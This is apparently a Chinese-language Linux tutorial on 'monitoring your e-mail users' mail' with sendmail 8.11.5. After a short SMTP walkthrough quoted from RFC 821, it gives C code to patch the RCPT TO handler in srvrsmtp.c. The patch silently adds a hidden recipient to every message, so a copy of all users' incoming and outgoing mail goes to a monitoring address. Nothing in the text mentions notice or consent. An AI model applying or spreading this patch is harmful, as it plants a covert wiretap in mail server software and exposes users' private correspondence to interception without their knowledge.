当前位置:Linux教程 - Linux - 监控你E-mail用户的邮件(sendmail篇)

监控你E-mail用户的邮件(sendmail篇)

一、简介

如果你的邮件系统是用sendmail,不论你是用它来发送、接收邮件还是仅仅将其作为一台Mail Relay Host,你都可以通过简单的修改一下sendmail源代码来捕获用户的邮件。

二、环境

FreeBSD 4.3 Release + sendmail 8.11.5,从www.sendmail.org下载源代码包sendmail-8.11.5.tar.gz,运行:

# tar zxvf sendmail-8.11.5.tar.gz

在当前目录下生成sendmail-8.11.5目录

三、步骤

先让我们来看一个SMTP通信的例子:(参考:rfc821.txt)

This SMTP example shows mail sent by Smith at host Alpha.ARPA,
to Jones, Green, and Brown at host Beta.ARPA. Here we assume
that host Alpha contacts host Beta directly.

S: MAIL FROM:
R: 250 OK

S: RCPT TO:
R: 250 OK

S: RCPT TO:
R: 550 No such user here

S: RCPT TO:
R: 250 OK

S: DATA
R: 354 Start mail input; end with .
S: Blah blah blah...
S: ...etc. etc. etc.
S: .
R: 250 OK

虽然在一个SMTP过程中可能还有很多其他命令的交互,但核心的就这么三步:MAIL FROM、RCPT TO、DATA。在./sendmail-8.11.5/sendmail下有一个文件srvrsmtp.c,有一个大函数smtp(),它里面的switch循环就是专门处理SMTP通信,即上面例子中R响应。任何一个SMTP 过来的邮件 —— 不论是来自outlook express这样的邮件客户端软件,还是Internet上的一台MAIL HOST,smtp()依次处理对方发送过来的MAIL FROM、RCPT TO、DATA命令,从中获得send、recipient list、message,统统存入一个struct ENVELOPE变量中,最后调用sendall()再将邮件转给recipient list。因此,我们只需要在smtp()处理RCPT TO时将我们的监控E-mail Address加进去就可以了。

1、首先在smtp()变量声明处加入一个变量:
int spydone = 0;

2、打开srvrsmtp.c,搜索关键字:case CMDRCPT,从这行开始往下的201行是处理recipient list代码。在该case段的最后一行 ,即break;前,我们插入如下代码:
if(!spydone)
{
a = parseaddr("""", NULLADDR, RF_COPYALL, '' '', &delimptr, e); /* 将[email protected]换成监控e-mail */
a = recipient(a, &e->e_sendqueue, 0, e);
e->e_to = a->q_paddr;
nrcpts++;
spydone = 1;
}
保存退出,在./sendmail-8.11.5下运行:make; make install 编译、安装。经过修改的sendmail,对于用户接收发送的邮件,都会发送一份到[email protected]里。